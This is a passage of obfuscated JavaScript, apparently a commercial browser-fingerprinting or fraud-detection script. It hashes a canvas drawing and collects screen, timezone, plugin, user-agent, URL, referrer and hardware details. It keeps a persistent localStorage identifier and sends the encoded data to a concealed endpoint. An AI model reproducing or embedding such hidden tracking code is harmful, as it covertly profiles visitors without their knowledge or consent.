td_Ax=td_Z0(td_Ax,td_aD,td_zj,td_hB,td_cG[td_bI+4],6,-145523070);td_hB=td_Z0(td_hB,td_Ax,td_aD,td_zj,td_cG[td_bI+11],10,-1120210379);td_zj=td_Z0(td_zj,td_hB,td_Ax,td_aD,td_cG[td_bI+2],15,718787259);td_aD=td_Z0(td_aD,td_zj,td_hB,td_Ax,td_cG[td_bI+9],21,-343485551); td_Ax=td_al(td_Ax,td_sY);td_aD=td_al(td_aD,td_P4);td_zj=td_al(td_zj,td_qQ);td_hB=td_al(td_hB,td_I3);}return Array(td_Ax,td_aD,td_zj,td_hB);}function td_KG(td_CU,td_cQ,td_jz,td_q4,td_Y6,td_vL){return td_al(td_uJ(td_al(td_al(td_cQ,td_CU),td_al(td_q4,td_vL)),td_Y6),td_jz); }function td_LP(td_N8,td_Uz,td_g4,td_PP,td_yh,td_fP,td_Y1){return td_KG((td_Uz&td_g4)|((~td_Uz)&td_PP),td_N8,td_Uz,td_yh,td_fP,td_Y1);}function td_mn(td_fo,td_qU,td_uW,td_ba,td_rB,td_zp,td_v7){return td_KG((td_qU&td_ba)|(td_uW&(~td_ba)),td_fo,td_qU,td_rB,td_zp,td_v7); }function td_Xs(td_Im,td_D4,td_xs,td_m1,td_eP,td_O0,td_jG){return td_KG(td_D4^td_xs^td_m1,td_Im,td_D4,td_eP,td_O0,td_jG);}function td_Z0(td_Vi,td_dW,td_sp,td_BE,td_s2,td_Ot,td_oF){return td_KG(td_sp^(td_dW|(~td_BE)),td_Vi,td_dW,td_s2,td_Ot,td_oF); }function td_al(td_ny,td_Vg){var td_CY=(td_ny&65535)+(td_Vg&65535);var td_un=(td_ny>>16)+(td_Vg>>16)+(td_CY>>16);return((td_un<<16)|(td_CY&65535));}function td_uJ(td_RN,td_GF){return((td_RN<<td_GF)|(td_RN>>>(32-td_GF))); }return td_XI(td_Rt(td_Dj(td_WH)));};td_3A.tdz_aafef63778cd4da5ae7ace45d4d7ce55=new td_3A.td_0j("\x61\x61\x66\x65\x66\x36\x33\x37\x37\x38\x63\x64\x34\x64\x61\x35\x61\x65\x37\x61\x63\x65\x34\x35\x64\x34\x64\x37\x63\x65\x35\x35\x30\x37\x31\x34\x30\x38\x30\x36\x31\x32\x35\x66\x35\x63\x35\x39\x35\x32\x35\x63\x35\x34\x35\x37\x35\x32\x35\x36\x35\x31\x35\x30\x30\x35\x30\x37\x35\x31\x35\x33\x30\x31\x35\x32\x30\x37\x31\x33\x30\x38\x35\x35\x33\x62\x35\x38\x30\x66\x30\x31\x30\x38\x31\x33\x30\x64\x30\x30\x35\x62\x31\x37\x30\x61\x34\x35"); var td_3A=td_3A||{};if(typeof td_3A.td_3i===[][[]]+""){td_3A.td_3i=[];}var td_Gw;function td_SW(){if(typeof td_Gw===td_3A.tdz_aafef63778cd4da5ae7ace45d4d7ce55.td_f(0,8)){td_Gw();}}function td_1i(){try{if(window.localStorage){var td_lP=null; var td_Tx=null;var td_rE=window.localStorage.getItem(td_3A.tdz_aafef63778cd4da5ae7ace45d4d7ce55.td_f(8,15));if(td_rE!==null){var td_di=td_rE.split("_");if(td_di.length===2){var td_wF=td_di[1];if(td_wF<td_W()){window.localStorage.setItem(td_3A.tdz_aafef63778cd4da5ae7ace45d4d7ce55.td_f(8,15),td_0e); td_lP=td_0e.split("_")[0];td_Tx=td_di[0];}else{td_lP=td_di[0];}}else{if(td_di.length===1){window.localStorage.setItem(td_3A.tdz_aafef63778cd4da5ae7ace45d4d7ce55.td_f(8,15),td_di[0]+"_"+td_0e.split("_")[1]); td_lP=td_di[0];}else{window.localStorage.setItem(td_3A.tdz_aafef63778cd4da5ae7ace45d4d7ce55.td_f(8,15),td_0e);td_lP=td_0e.split("_")[0];}}}else{window.localStorage.setItem(td_3A.tdz_aafef63778cd4da5ae7ace45d4d7ce55.td_f(8,15),td_0e); td_lP=td_0e.split("_")[0];}var td_t3="";if(td_Tx!==null){td_t3=td_3A.tdz_aafef63778cd4da5ae7ace45d4d7ce55.td_f(23,8)+td_Tx;}var td_E3=td_0o+td_t3+td_3A.tdz_aafef63778cd4da5ae7ace45d4d7ce55.td_f(31,4)+td_3q+td_lP; td_2b(td_E3,document);return td_E3;}}catch(td_Wn){td_SW();}}function td_1Z(){td_3A.td_1T();td_3A.td_1F(document);td_q();td_Gw=function(){try{window.parent.postMessage(td_3A.tdz_aafef63778cd4da5ae7ace45d4d7ce55.td_f(35,3),"*"); }catch(td_kH){}};td_1i();}td_3A.td_3i.push(function(){var td_1L = new td_3A.td_0j("ed3c6652dbeb42fbb75b24e369f958c70D104713450C1A1D0D0F02111A410F050C5E531B561A065C5B1600491A5B0F5204161D1358510A5D16053A0B500F1150164F5A5753554340534A15505A563C5E01590155000F5454055351070554050704550356000D510555015258015902010607150D59585657595751010204505204555752010D54500F0D525A0C0F5B000701575452020004075A525002545751030304560500515557005E0C500855065301010204005706573D545505015356500E0D57040652");td_0o = td_1L.td_f(0,121);td_3q = td_1L.td_f(121,16);td_0e = td_1L.td_f(137,46);});td_3A.tdz_577c14efe78c4e2a96896846d4acf83d=new td_3A.td_0j("\x35\x37\x37\x63\x31\x34\x65\x66\x65\x37\x38\x63\x34\x65\x32\x61\x39\x36\x38\x39\x36\x38\x34\x36\x64\x34\x61\x63\x66\x38\x33\x64\x34\x35\x34\x35\x34\x33\x31\x36\x34\x34\x34\x33\x31\x33\x31\x63\x31\x64\x34\x63\x34\x33\x31\x66\x34\x38\x31\x61\x34\x63\x30\x30\x35\x39\x35\x64\x35\x61\x35\x63\x35\x33\x34\x38\x34\x36\x34\x32\x31\x31\x34\x31\x31\x36\x31\x35\x31\x63\x34\x30\x34\x38\x31\x65\x34\x65\x34\x62\x34\x38\x31\x65\x34\x30\x34\x66\x31\x66\x31\x33\x31\x30\x34\x35\x34\x66\x31\x32\x34\x61\x31\x65\x34\x38\x31\x64\x34\x35\x34\x38\x34\x34\x35\x38\x35\x37\x35\x62\x34\x34\x34\x35\x31\x35\x34\x30\x31\x64\x31\x32\x31\x30\x34\x31\x34\x66\x31\x66\x34\x66\x34\x64\x34\x62\x31\x64\x34\x66\x34\x35\x31\x65\x31\x63\x31\x30\x34\x33\x34\x39\x31\x35\x34\x64\x31\x61\x34\x32\x31\x33\x34\x33\x34\x33\x34\x63\x34\x65\x34\x30\x34\x31\x34\x61\x34\x64\x31\x65\x34\x64\x31\x64\x31\x64\x31\x38\x35\x39\x35\x32\x30\x66\x35\x37\x35\x32\x35\x33\x30\x34\x35\x37\x35\x34\x30\x64\x30\x63\x30\x66\x34\x37\x34\x61\x31\x39\x34\x31\x31\x31\x34\x35\x31\x37\x34\x30\x34\x38\x34\x33\x34\x33\x34\x66\x34\x34\x34\x61\x34\x38\x30\x35\x35\x34\x30\x32\x30\x31\x30\x33\x35\x35\x35\x34\x30\x33\x35\x63\x35\x66\x35\x63\x30\x63\x34\x31\x34\x36\x31\x66\x31\x33\x31\x31\x34\x30\x34\x65\x31\x61\x34\x61\x31\x65\x34\x38\x31\x38\x34\x35\x34\x38\x34\x36\x35\x38\x35\x36\x35\x62\x35\x36\x35\x33\x30\x36\x35\x33\x30\x37\x30\x64\x31\x36\x34\x61\x34\x39\x31\x31\x34\x31\x34\x30\x34\x31\x31\x61\x34\x66\x34\x66\x31\x66\x31\x66\x31\x39\x34\x39\x34\x36\x30\x32\x35\x35\x30\x37\x35\x30\x30\x34\x35\x64\x35\x31\x35\x65\x35\x38\x35\x65\x35\x33\x35\x66\x34\x36\x31\x36\x34\x65\x31\x34\x31\x37\x31\x31\x34\x65\x34\x61\x31\x61\x34\x65\x34\x64\x34\x65\x31\x66\x34\x66\x34\x61\x30\x34\x30\x36\x30\x30\x35\x35\x35\x64\x30\x34\x35\x62\x30\x62\x31\x34\x30\x62\x35\x38\x35\x35\x30\x35\x30\x38\x31\x30\x35\x32\x35\x31\x30\x62"); var td_3A=td_3A||{};var td_2L=td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(0,21);var td_3h=td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(21,15);var td_3u=td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(36,18); var td_3L=td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(54,15);var td_2p=td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(69,9);var td_0G=td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(78,27);var td_0n=td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(105,27); var td_3M=td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(132,24);var td_3x=td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(156,27);var td_1b=td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(183,21);function td_3y(td_V,td_S,td_L){var td_z=td_3A.td_3k(td_S); if(td_z===null){return;}return td_x(td_V,td_z,td_L);}function td_x(td_Y,td_k,td_p){if(td_Y.attachEvent){td_Y.attachEvent(td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(204,2)+td_k,function(td_U){td_p(td_U||window.event); });}else{td_Y.addEventListener(td_k,td_p,false);}}function td_2A(td_r,td_T,td_m){var td_V=td_3A.td_3k(td_T);if(td_V===null){return;}return td_J(td_r,td_V,td_m);}function td_J(td_N,td_B,td_e){if(td_N.attachEvent){td_N["e"+td_B+td_e]=td_e; td_N[td_B+td_e]=function(){td_N["e"+td_B+td_e](window.event);};td_N.detachEvent(td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(204,2)+td_B,td_N[td_B+td_e]);}else{td_N.removeEventListener(td_B,td_e,false); }}function td_j(){var td_T=500;var td_s=30000;var td_Y=[];var td_U=0;this.addFeature=function(td_D,td_H){if(typeof td_H===[][[]]+""||td_H<td_T){td_H=td_T;}var td_f=Math.ceil(td_H/td_T);td_Y.push([td_D,td_f,true]); td_D.setup();};this.getFeaturesForTest=function(){return td_Y;};this.start=function(){if(td_Y.length===0){return;}setTimeout(td_0P.check,td_T);};this.check=function(){var td_X;var td_C="";var td_i=0;td_U++; for(td_X=0;td_X<td_Y.length;td_X++){var td_H=td_Y[td_X][0];var td_P=td_Y[td_X][1];var td_V=td_Y[td_X][2];if(!td_V){td_i++;continue;}if(td_U>=td_P){var td_t=td_H.getFPParams();if(td_t!==null){td_C+=td_t; }if(!td_H.tryAgain()){td_Y[td_X][2]=false;td_i++;}else{}}}if(td_C.length>0){var td_G=td_0o+td_3A.tdz_577c14efe78c4e2a96896846d4acf83d.td_f(206,10)+td_3A.td_2D(td_C,td_1o);td_2b(td_G,document);}if(td_U>=Math.ceil(td_s/td_T)){return; }if(td_i<td_Y.length){setTimeout(td_0P.check,td_T);}else{}};}var td_0P=new td_j();var td_3A=td_3A||{};td_3A.td_0Y=function(){};td_3A.hasDebug=false;td_3A.trace=function(){};td_3A.hasTrace=false;td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9=new td_3A.td_0j("\x65\x33\x65\x64\x61\x37\x63\x39\x33\x36\x32\x32\x34\x39\x39\x63\x39\x31\x31\x31\x61\x38\x32\x61\x32\x36\x32\x63\x34\x66\x61\x39\x30\x36\x35\x32\x30\x62\x31\x32\x30\x30\x34\x34\x35\x31\x35\x64\x37\x33\x37\x34\x34\x30\x35\x64\x34\x33\x34\x61\x35\x63\x31\x31\x34\x61\x34\x66\x31\x34\x35\x37\x30\x38\x35\x36\x35\x35\x32\x36\x36\x32\x36\x34\x35\x62\x30\x64\x34\x30\x34\x32\x34\x37\x31\x35\x35\x39\x35\x30\x30\x34\x30\x61\x31\x37\x35\x36\x31\x30\x30\x37\x30\x62\x34\x36\x34\x61\x31\x32\x37\x35\x34\x62\x35\x30\x30\x32\x35\x35\x30\x30\x30\x33\x34\x31\x31\x39\x31\x38\x37\x33\x31\x33\x35\x62\x35\x37\x35\x65\x30\x65\x35\x35\x30\x31\x30\x34\x35\x37\x31\x31\x35\x32\x35\x35\x34\x61\x35\x34\x30\x36\x34\x64\x30\x39\x34\x31\x35\x33\x35\x36\x35\x62\x35\x39\x35\x38\x35\x65\x30\x36\x31\x36\x34\x31\x35\x66\x35\x36"); var td_3A=td_3A||{};function td_2h(){try{var td_M3=document.createElement(td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(0,6));if(!td_M3){return null;}if(!(td_M3.getContext)){return null;}var td_wV=td_M3.getContext(td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(6,2)); if(!td_wV){return null;}if(!td_wV.font||!td_wV.fillText){return null;}td_M3.width=300;td_M3.height=100;td_wV=td_M3.getContext(td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(6,2));var td_Yd=td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(8,32); td_wV.font=td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(40,9);td_wV.fillText(td_Yd,0,50);td_wV.font=td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(49,10);var td_Ca=td_wV.createLinearGradient(0,0,td_M3.width,0); td_Ca.addColorStop("0",td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(59,7));td_Ca.addColorStop(td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(66,3),Number(348826).toString(31));td_Ca.addColorStop(td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(69,3),td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(72,3)); td_wV.fillStyle=td_Ca;td_wV.fillText(td_Yd,0,90);var td_OH=td_M3.toDataURL(td_3A.tdz_e3eda7c93622499c9111a82a262c4fa9.td_f(75,9));if(!td_OH){return null;}return td_3d(td_OH);}catch(td_wO){return null;}}var td_3A=td_3A||{};function td_2W(){td_3A.load_iframe(td_2v,td_2c,document);}var td_3A=td_3A||{};if(typeof td_3A.td_3i===[][[]]+""){td_3A.td_3i=[];}var td_0o,td_0y,td_0w,td_1k,td_2v,td_1o,td_0s,td_0e,td_3q,td_jF=[],td_3z,td_0J,td_0p,td_0R,td_3X,td_2V,td_0b=[],td_0B,td_2e,td_2g,td_1t,td_1w,td_1J,td_1h,td_0F,td_3E,td_2c=null; if(typeof navigator!==[][[]]+""){td_jF=navigator.mimeTypes;}td_3A.td_3i.push(function(){var td_3B = new td_3A.td_0j("c98f91cfadab4ce18ff5c1ff5781a71e0B4D4C164A0B4C491656151A5B56045015515F050101020700530B085155075C52085E535B53575F0706515001015D055C0251045557035F051A4B500219554B02581609575D0A0804490C0740110C49160803414C571649565B5D501319410B040657145E6E0A025C1353164C0C50505940155010420F095B6851555C0507535A585E07080506570707040456555103015250565B05075254560E5202115F0A0D5A5D5B0C05005057525104560155020157050C45550F5B4C524B59154341165916170F54561048120D060C5D051C55160509584C5716494158486E07471F0D1754545D7A783055322D255F0221510309515E745770275507060907270F70205B7B002378705452245720530B0C1756670F02081403121E5A02595047445416105057086658075B5352575B550504000C0357530054000403030A085501525D57580C0758070005470A0E0C570658040C0550035501000457070B085054080D174D4815031E4C0F0C03124C470A025F51001F514D52090B1A51481E0D446E0313175012545D5825283752317D2758077A5254045409275274760B03500607235B787D5E7B092627205355270722540E5714016A0A555B110743405E54565043105C4B15505E0D3908005C5002555C505E0757010600000550515A0755050851555A005258050207570702445A0C0B525D5B53010007505005515A5351040854000050124D41105C4E4B080F53104B425101085C054802485658551E07471E060F5C591417410D015E0B13056B0A010C4F54124D0C04070713445D42125E5E0B3C505C5B0B07555F00020053000654575B0300575505545F01015B0955560504020F5B051F5F0C0802015C57000053070E5600570101555F04540159154341165916170F54561048120D060C5D051C55160509584C571649565B5D501319410B040D0C0500065B5103010555505750075B1154411B5E530754050E0758565704520D5D575F520600035255500D575352005207010250500556020C5257010755055B5A560A0852055805004C5B0D095856034B580645140F4D19565415");td_0o = td_3B.td_f(514,121);td_0s = td_3B.td_f(689,8);td_3E = td_3B.td_f(729,16);td_2J = td_3B.td_f(187,164);td_3q = td_3B.td_f(673,16);td_1o = td_3B.td_f(697,32);td_0c = td_3B.td_f(0,187);td_0y = td_3B.td_f(635,38);td_2v = td_3B.td_f(351,163);td_0F = td_3B.td_f(745,20);});var td_2K={};td_2K.td_2r=function(td_T,td_H){td_H=(typeof td_H===[][[]]+"")?true:td_H;if(td_H){td_T=td_0W.td_0k(td_T);}var td_E=[1518500249,1859775393,2400959708,3395469782];td_T+=String.fromCharCode(128); var td_L=td_T.length/4+2;var td_x=Math.ceil(td_L/16);var td_V=new Array(td_x);for(var td_m=0;td_m<td_x;td_m++){td_V[td_m]=new Array(16);for(var td_N=0;td_N<16;td_N++){td_V[td_m][td_N]=(td_T.charCodeAt(td_m*64+td_N*4)<<24)|(td_T.charCodeAt(td_m*64+td_N*4+1)<<16)|(td_T.charCodeAt(td_m*64+td_N*4+2)<<8)|(td_T.charCodeAt(td_m*64+td_N*4+3)); }}td_V[td_x-1][14]=((td_T.length-1)*8)/Math.pow(2,32);td_V[td_x-1][14]=Math.floor(td_V[td_x-1][14]);td_V[td_x-1][15]=((td_T.length-1)*8)&4294967295;var td_k=1732584193;var td_Z=4023233417;var td_l=2562383102; var td_t=271733878;var td_n=3285377520;var td_v=new Array(80);var td_D,td_C,td_u,td_B,td_G;for(var td_m=0;td_m<td_x;td_m++){for(var td_i=0;td_i<16;td_i++){td_v[td_i]=td_V[td_m][td_i];}for(var td_i=16;td_i<80; td_i++){td_v[td_i]=td_2K.td_1j(td_v[td_i-3]^td_v[td_i-8]^td_v[td_i-14]^td_v[td_i-16],1);}td_D=td_k;td_C=td_Z;td_u=td_l;td_B=td_t;td_G=td_n;for(var td_i=0;td_i<80;td_i++){var td_j=Math.floor(td_i/20);var td_w=(td_2K.td_1j(td_D,5)+td_2K.f(td_j,td_C,td_u,td_B)+td_G+td_E[td_j]+td_v[td_i])&4294967295; td_G=td_B;td_B=td_u;td_u=td_2K.td_1j(td_C,30);td_C=td_D;td_D=td_w;}td_k=(td_k+td_D)&4294967295;td_Z=(td_Z+td_C)&4294967295;td_l=(td_l+td_u)&4294967295;td_t=(td_t+td_B)&4294967295;td_n=(td_n+td_G)&4294967295; }return td_2K.td_0T(td_k)+td_2K.td_0T(td_Z)+td_2K.td_0T(td_l)+td_2K.td_0T(td_t)+td_2K.td_0T(td_n);};td_2K.f=function(td_Y,td_r,td_l,td_D){switch(td_Y){case 0:return(td_r&td_l)^(~td_r&td_D);case 1:return td_r^td_l^td_D; case 2:return(td_r&td_l)^(td_r&td_D)^(td_l&td_D);case 3:return td_r^td_l^td_D;}};td_2K.td_1j=function(td_P,td_G){return(td_P<<td_G)|(td_P>>>(32-td_G));};td_2K.td_0T=function(td_r){var td_F="",td_q;for(var td_c=7; td_c>=0;td_c--){td_q=(td_r>>>(td_c*4))&15;td_F+=td_q.toString(16);}return td_F;};var td_0W={};td_0W.td_0k=function(td_c){var td_F=td_c.replace(/[\u0080-\u07ff]/g,function(td_e){var td_Z=td_e.charCodeAt(0); return String.fromCharCode(192|td_Z>>6,128|td_Z&63);});td_F=td_F.replace(/[\u0800-\uffff]/g,function(td_V){var td_W=td_V.charCodeAt(0);return String.fromCharCode(224|td_W>>12,128|td_W>>6&63,128|td_W&63); });return td_F;};function td_3d(td_d){return td_2K.td_2r(td_d,true);}td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e=new td_3A.td_0j("\x38\x30\x30\x32\x65\x64\x33\x64\x38\x66\x37\x65\x34\x39\x34\x36\x39\x66\x36\x64\x63\x39\x34\x36\x61\x61\x32\x38\x62\x32\x32\x65\x31\x65\x35\x61\x35\x32\x30\x66\x30\x39\x31\x35\x30\x65\x34\x32\x35\x32\x30\x37\x30\x61\x34\x33\x35\x32\x30\x34\x31\x32\x35\x37\x35\x66\x35\x62\x31\x30\x31\x37\x31\x62\x34\x30\x30\x39\x31\x30\x30\x63\x31\x35\x30\x66\x31\x65\x30\x66\x35\x63\x30\x66\x34\x33\x34\x66\x30\x64\x31\x36\x35\x31\x35\x38\x34\x32\x34\x39\x35\x39\x31\x65\x31\x35\x35\x34\x30\x31\x30\x39\x31\x66\x35\x38\x35\x65\x30\x34\x31\x35\x34\x32\x31\x36\x30\x61\x35\x37\x35\x33\x31\x30\x30\x35\x31\x33\x30\x66\x31\x65\x31\x32\x30\x66\x31\x34\x31\x35\x35\x34\x30\x64\x31\x36\x34\x32\x30\x64\x35\x39\x31\x35\x30\x63\x35\x30\x35\x62\x34\x32\x30\x62\x35\x66\x35\x37\x35\x62\x34\x31\x35\x37\x34\x30\x35\x63\x31\x37\x30\x63\x30\x34\x31\x32\x35\x63\x31\x32\x30\x33\x30\x66\x31\x65\x30\x38\x34\x31\x35\x64\x31\x30\x30\x35\x31\x36\x35\x61\x34\x31\x30\x37\x31\x31\x30\x65\x34\x32\x35\x32\x31\x35\x35\x61\x31\x30\x30\x39\x34\x64\x34\x36\x34\x33\x35\x63\x30\x38\x34\x33\x30\x39\x30\x31\x35\x63\x34\x36\x31\x30\x30\x66\x30\x39\x35\x31\x30\x35\x34\x34\x35\x63\x35\x36\x30\x38\x30\x35\x31\x36\x34\x34\x34\x38\x30\x31\x35\x39\x31\x35\x30\x31\x34\x30\x35\x35\x30\x61\x34\x33\x35\x33\x35\x35\x36\x62\x35\x35\x30\x34\x34\x30\x35\x31\x30\x38\x33\x63\x35\x31\x30\x39\x31\x30\x30\x32\x30\x32\x35\x36\x30\x35"); var td_3A=td_3A||{};var td_VA=255;function td_0K(){td_3z=new td_gJ(td_1x.td_2X);td_0J=new td_uT(td_1x.td_1m);td_0p=new td_a1(td_1x.td_3R);var td_v3="";try{td_v3+=td_lX();}catch(td_jw){}try{td_v3+=td_SY(); }catch(td_jw){}var td_gl=navigator.userAgent?td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(0,4)+td_3A.td_2D(td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(4,3)+encodeURIComponent(navigator.userAgent),td_1o):""; var td_Tz=td_0o+td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(7,4)+td_3A.td_2D(td_v3,td_1o)+td_gl;if(typeof td_3m!==[][[]]+""){var td_o1=function(){setTimeout(function(){td_3m(td_1o);},2000);};}td_2b(td_Tz,document,td_o1); }function td_YZ(){try{var td_Kt=1;if(window&&window.devicePixelRatio){td_Kt=window.devicePixelRatio;}var td_Mf=0;var td_w0=0;var td_Bb=0;var td_Dv=0;if(screen&&screen.width&&screen.height){td_Mf=screen.width*td_Kt; td_w0=screen.height*td_Kt;}else{if(window&&window.screen.width&&window.screen.height){td_Mf=window.screen.width*td_Kt;td_w0=window.screen.height*td_Kt;}}var td_yG=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(11,3)+td_Mf+"x"+td_w0; if(window&&window.screen&&window.screen.availWidth&&window.screen.availHeight){td_Bb=window.screen.availWidth*td_Kt;td_Dv=window.screen.availHeight*td_Kt;}if(td_Bb!==0&&td_Dv!==0){td_yG+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(14,4)+td_Bb+"x"+td_Dv; }if(typeof window!==[][[]]+""&&typeof window.screenX!==[][[]]+""&&typeof window.screenY!==[][[]]+""){var td_jo=window.screenX*td_Kt;var td_MZ=window.screenY*td_Kt;td_yG+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(18,5)+td_jo+"x"+td_MZ; }return td_yG;}catch(td_vs){}return"";}function td_lX(){var td_D4=new Date();td_D4.setDate(1);td_D4.setMonth(5);var td_GS=-td_D4.getTimezoneOffset();td_D4.setMonth(11);var td_EZ=-td_D4.getTimezoneOffset(); var td_PU=Math.min(td_GS,td_EZ);var td_dT=Math.max(td_GS,td_EZ)-td_PU;var td_Ef=td_jF?td_jF.length:0;var td_ek=[];for(var td_Jx=0;td_Jx<td_Ef;td_Jx++){td_ek[td_Jx]=td_jF[td_Jx].type;}var td_T9=td_Ef>0?td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(23,4)+td_1f(td_ek.join())+td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(27,4)+td_Ef:""; var td_Oy="";if(td_3q!==null){td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(31,3)+td_3q;}td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(34,3)+td_PU+td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(37,3)+td_dT+td_YZ()+td_T9; td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(40,5)+screen.colorDepth;td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(45,4)+encodeURIComponent(location.href.substring(0,td_VA));var td_nS=encodeURIComponent(document.referrer.substring(0,td_VA)); if(typeof td_0h===td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(49,6)&&td_0h.length>0&&window!==window.top&&td_nS.length===0){td_nS=td_0h;}td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(55,4)+td_nS; var td_xU=td_pA();if(td_xU!==null){td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(59,3)+td_xU;}var td_wk=navigator.plugins;if(td_wk.length){var td_Wd=td_wk.length;td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(62,4)+td_Wd; var td_XZ;for(td_Jx=0;td_Jx<td_Wd;td_Jx++){td_XZ+=td_wk[td_Jx].name+td_wk[td_Jx].description+td_wk[td_Jx].filename+td_wk[td_Jx].length;}td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(66,4)+td_1f(td_XZ); }td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(70,4)+td_1f(td_0s+td_1o);if(td_1x.td_1O!==td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(74,7)){td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(81,5)+encodeURIComponent(td_1x.td_1O); }if(td_1x.td_1m!==td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(74,7)){if(td_1x.td_3R!==td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(74,7)){td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(86,5)+encodeURIComponent(td_1x.td_1m+" "+td_1x.td_3R); }else{td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(86,5)+encodeURIComponent(td_1x.td_1m);}}if(td_1x.td_1S!==td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(74,7)){td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(91,6)+encodeURIComponent(td_1x.td_1S); }if(td_1x.td_2S!==td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(74,7)){td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(97,6)+encodeURIComponent(td_1x.td_2S);}if(td_1x.td_2j===true){td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(103,10); }if(typeof navigator!==[][[]]+""){if(typeof navigator.hardwareConcurrency===td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(113,6)){td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(119,5)+navigator.hardwareConcurrency; }if(typeof navigator.deviceMemory===td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(113,6)){td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(124,5)+navigator.deviceMemory;}}if(typeof Intl!==[][[]]+""&&typeof Intl.DateTimeFormat!==[][[]]+""){var td_yc=Intl.DateTimeFormat(); if(td_yc!==null&&typeof td_yc!==[][[]]+""&&typeof td_yc.resolvedOptions!==[][[]]+""){var td_HK=td_yc.resolvedOptions();if(td_HK!==null&&typeof td_HK.timeZone===td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(49,6)&&td_HK.timeZone.length>0){td_Oy+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(129,5)+encodeURIComponent(td_HK.timeZone); }}}td_3C(td_0y,document);return td_Oy;}function td_SY(){var td_e3="";if(typeof td_2h!==[][[]]+""){var td_yz=td_2h();if(td_yz){td_e3+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(134,5)+td_yz;}}if(typeof td_0z!==[][[]]+""){var td_NC=td_0z(); if(td_NC){td_e3+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(139,6)+encodeURIComponent(td_NC)+td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(145,6)+td_3d(td_NC);}}if(typeof td_3a!==[][[]]+""){var td_Mi=td_3a(); if(td_Mi){td_e3+=td_Mi;}}if(typeof td_0i!==[][[]]+""){td_0i();}if(typeof td_2W!==[][[]]+""){td_2W();}else{if(typeof td_1i!==[][[]]+""){td_1i();}}if(typeof td_0A!==[][[]]+""){td_0A();}else{if(typeof td_3G!==[][[]]+""){td_3G(); }}if(typeof td_3g!==[][[]]+""){td_3g();}if(typeof td_1W!==[][[]]+""){td_1W();}if(typeof td_0P!==[][[]]+""){if(typeof td_3Q!==[][[]]+""){td_0P.addFeature(new td_3Q());}if(typeof td_0r!==[][[]]+""){td_0P.addFeature(new td_0r()); }}if(typeof td_1M!==[][[]]+""){td_1M(td_0B,td_2e,td_2g);}if(typeof 